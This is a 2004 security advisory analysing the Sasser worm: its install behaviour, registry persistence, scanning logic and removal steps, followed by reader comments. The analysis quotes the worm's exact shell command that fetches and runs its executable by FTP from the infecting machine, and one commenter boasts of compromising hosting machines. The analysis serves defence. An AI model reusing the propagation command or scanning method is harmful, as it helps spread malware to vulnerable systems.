URL
http://www.lurhq.com/sasser.html

Release Date
May 1, 2004

Summary
A new worm called "Sasser" has been found spreading in the wild.

Analysis
The worm utilizes the MS04-011 LSASS exploit released by "houseofdabus" on Thursday April 29 2004. The worm executable was compiled on Friday April 30 2004 at 19:23:16 (timezone unknown).
When executed, the worm:

Installs itself to %WINDIR% as avserve.exe
Adds the following registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
avserve.exe -> C:\%WINDIR%\avserve.exe

Creates a Mutex "Jobaka31" to ensure only one copy of the worm runs in memory
Spawns a mini-FTP server on TCP port 5554 to deliver the worm executable to exploited systems
Spawns 128 threads to scan for and exploit vulnerable systems
Calls API method AbortSystemShutdown to prevent the system from rebooting
Sleeps for 3 seconds then loops back to the AbortSystemShutdown call
The scanner threads work as described below:

The thread attempts to determine the local subnet address
A target IP to exploit to is generated:
50% of the time it will attempt to exploit a completely random IP address
25% of the time it will attempt to exploit a random address within the same first octet of the local subnet
25% of the time it will attempt to exploit a random address within the same first and second octets of the local subnet
If successful, the LSASS exploit will open a shell on the remote system on TCP port 9996
The worm will connect to this port and attempt to send the following commands:

echo off&echo open [infecting machine's IP] 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [rand]_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]i_up.exe&echo off&del cmd.ftp&echo on

This will copy the worm executable to the target machine, where it will run and begin to spread
The thread sleeps for 250 milliseconds, then repeats the entire process
Removal
Use the task manager to kill the avserve.exe process, then delete the HKLM\Software\Microsoft\Windows\CurrentVersion\Run\avserv.exe registry key. It may not be possible to run Windows Update to install the patch before the machine is compromised again, similar to what Windows users experienced with the Blaster worm. Block TCP port 445 then patch the system for MS04-011, or download and install the patches from a CDROM while offline.

More detailed removal instructions are available from Microsoft at http://www.microsoft.com/security/incident/sasser.asp

monday will be a bad day for networking security in big firms .....

it wasnt, i just have to take the results I had yesterday. 5-10 domainhosting machines in <1hour ... shitty worm lets the vuln die now... that sucks...

dev'

Curse on the damn worms.

doesn't get past my fancy routers

congrats the the creator for ruining all of our fun

one of the lamest worms ever made.
uses stupid ways to transfer files.
transfers stupid files and often fails because of tcp filtering.
xcopy would have done this all without any ftp client.
and also compromised machines have 10 or more of this xxxx_up.exe files in system32.
whats the use of this worm anyhow. it only spreads, doesn't even close the hole and uses no backdoor. all just to wake up the lazy admins I guess

you'dd start thinking people are hired from ms to make such worms

u can all call worms lame and bad coded or whatever, but non of u made this worm, LOL i bet u would be overjoyed if this was your worm.